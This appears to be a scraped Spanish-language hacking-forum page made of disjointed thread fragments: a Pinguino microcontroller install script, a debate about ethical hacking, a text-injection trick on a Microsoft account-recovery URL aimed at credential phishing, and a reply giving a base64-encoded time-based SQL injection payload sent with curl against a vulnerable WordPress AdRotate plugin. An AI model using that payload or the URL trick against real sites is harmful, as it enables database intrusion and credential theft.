You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Genial! si, vi el sitio y vi que tenian una parte de ventas.. pero con el tema de la importacion en Argentina.. dudo que llegue.. por eso preguntaba para hacerlo yo.

Muchas gracias!

Saludos!

Tengo el pcb espera que lo encuentre y te lo subo y los materiales (hace un buen tiempo ya) que utilice creo que fueron entre 100 y 150 pesos.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Que buen proyecto Hielasangre!
Tenés idea si hay alguna forma de que yo pueda armarme uno de estos?
Es decir, es open hardware? hay circuitos y lista de componentes para armarlos?

Saludos!
ANTRAX

Ahora me fijo en lo que use y te paso la data

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

y si, es software y hardware libre

Pinguino es una plataforma similar a Arduino, y compatible con ella, pero basada en los micro-controladores PIC Microchip de 8 o 32 bits. Ademas, Pinguino se trata de hardware y software abierto. La meta de este proyecto es construir un IDE (Ambiente de Desarrollo Integrado, por sus siglas en ingles) el cual sea fácil de usar en GNU/Linux, Windows y Mac OS X. Arduino es una herramienta poderosa, pero tiene algunos defectos. Uno de estos inconvenientes es que no posee una interfaz USB nativa en el chip, limitando algunas de sus posibilidades. Ademas tiene menor variedad de periféricos integrados en el micro.

Instalar las bibliotecas:

libusb-1.0-0 
python-wxgtk2.8 
python-usb

Este script use para instalar el IDE de pinguino en slackware 14.1 si alguien le sirve dejo el script.

#!/bin/sh
# Script para instalar Pinguino IDE version beta 7 in Slackware 14.1
# Daniel Godoy : [email protected]

wget http://www.delincuentedigital.com.ar/pinguino%20beta%207/pinguino%20beta7%20linux%20.tar.gz

echo ------------------- "Creando Directorio"

mkdir pinguino 2>/dev/null
mv pinguino\ beta7\ linux\ .tar.gz pinguino/
cd pinguino


echo ------------------- "Desembalaje de archivos y eliminacion de el archivo .tar"

tar xzf pinguino\ beta7\ linux\ .tar.gz
rm pinguino\ beta7\ linux\ .tar.gz


echo ------------------- "Creando Permisos"

sudo groupadd microchip 2>/dev/null
sudo usermod -a -G microchip $USER


cd pinguino\ beta7\ linux\ /

sudo cp 41-microchip.rules /etc/udev/rules.d/
sudo cp 26-microchip.rules /etc/udev/rules.d/

echo ------------------- "Pinguino IDE instalado!"

Info del proyecto:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login


Los materiales para construir son estos:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

NOTA: yo no encontraba todos los elementos ( y ahorre en algunos por eso por ahi la placa no se ve igual a la mia )







UPDATE: Les recomiendo un ide mucho mas completo!!!

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

usa slackware  e instalale todo lo que necesites! me lo vas a agradecer :þ

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Esta muy bien el esfuerzo y el curro, pero ponerle el logo de underc0de a la aplicación igual ha sido pasarse, estas relaccionando un foro de hacking ético con usos no éticos.

Es algo asi como esto?

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

y se podría seguir numerando casos iguales, "foro de hacking ético" eso se puede discutir sin ánimos de ofender!

El estudio de malware es ético mientras no se haga alarde de cómo propagarlo, en mi opinión vaya

Con ese mismo concepto se puede usar el defacing para lo mismo por ejemplo "Retos", CTF, o hasta escenarios virtuales!

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Esta muy bien el esfuerzo y el curro, pero ponerle el logo de underc0de a la aplicación igual ha sido pasarse, estas relaccionando un foro de hacking ético con usos no éticos.

Es algo asi como esto?

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

y se podría seguir numerando casos iguales, "foro de hacking ético" eso se puede discutir sin ánimos de ofender!

Muy buena nota en CQC que les dejo para el que no la pudo ver o que quiere volver a verla

Después de mucho tiempo sin escribir voy a hacer un post sencillo y breve...
El ataque no es algo muy elaborado, pero el ataque es viable por medio de una variable (donde se especifica el correo al cual se envía la información cuando uno intenta resetear su clave)


El enlace es:

https://account.live.com/MessagePage.aspx?message=autocsrsuccess&[email protected]

Texto donde figura el correo electronico que aparece en la url:

Enviaremos un mensaje de correo electrónico a [email protected] para informarle si brindó suficiente información para recuperar su cuenta. Generalmente se necesitan alrededor de 24 horas para revisar la información enviada. Si ya envió una solicitud, la cerraremos y echaremos un vistazo en esta.

Si agregamos texto después del correo electrónico, podemos "alterar" el contenido de la web. Esto facilitaría a un atacante, que ingrese una url (solo en texto plano, ya que la web no permite tags html) engañando a la victima para que le facilite datos sensibles para el posterior robo de credenciales.

Por ejemplo, se podría realizar un ataque modificando la url y con un poco de ingenio dejarlo de la siguiente manera:

Eso es todo.

#RemoteExecution 2014
__EOF__

una curiosidad

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Anotame, lastima que no tengo mucho tiempo estos dias pero le meto

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Me puedes hacer un pequeño tutorial si no es mucha molestia , es que ahora no entiendo nada

O tambien podrias ponerte a estudiar sqli para que entiendas ese payload

jajaja tenia planeado decir lo mismo pero no quería ser duro xD

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Buenas , hola a todos ! (Perdona si el post no va en el sitio adecuado )

Pues tenia una duda con una inyección sql en wordpress. Analizando con wpscan veo que hay un plugin vulnerable . En el wpscan me sale esto :

*Title:Adrotate plugin <= 3.6.5 SQL Injection Vulnerability
*Reference: http:www.exploit-db.com/exploits/18114/

En la pagina de exploit-db me sale el codigo vulnerable pero realmente no se que hacer con eso , si alguien me puede echar una mano o pasarme algun tutorial para leer e informarme se lo agradeceria

payload="1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)#"
encoded=`echo -n "1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)#" | base64 -w 0`
curl You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

es facil la vulnerabilidad esta en la variable track. ahi inyecta el payload encodeado en base64

Para muestra, basta y sobra un boton: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Panochones
Xzite

No te alcanzo para pintar todo el auto? :B

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
que significa esto ponganme al tanto o:

lol no sirve para nada eso xD

esta mal puesta la antena, ya que va donde iria el LNB.



saluti

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Hablando de datos expuestos...

Me mato de Gorila antes que planero xD

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Metodo: GET
Input Name: passw

Si yo obtengo acceso a la caché del navegador del usuario, podría obtener fácilmente la información sensible
que se pueden guardar en texto plano

lo fixee de esta forma

Desactive el atributo autocomplete de campos de entrada que contienen datos sensibles
colocando autocomplete = "off" dentro de las etiquetas del campo de entrada

Out: Lo anduve scaneando por arriba , si le meto mas profundo calculo que tiene peores vulnerabilidades y posibilidades de bypassearlo

[/b]

WTF ? Es en serio? XD

Eso es lo de menos, el problema son los datos expuestos xD
Buen XSS :B

Este script es inseguro ya que se puede hacer crashear la db, por medio de las visitas...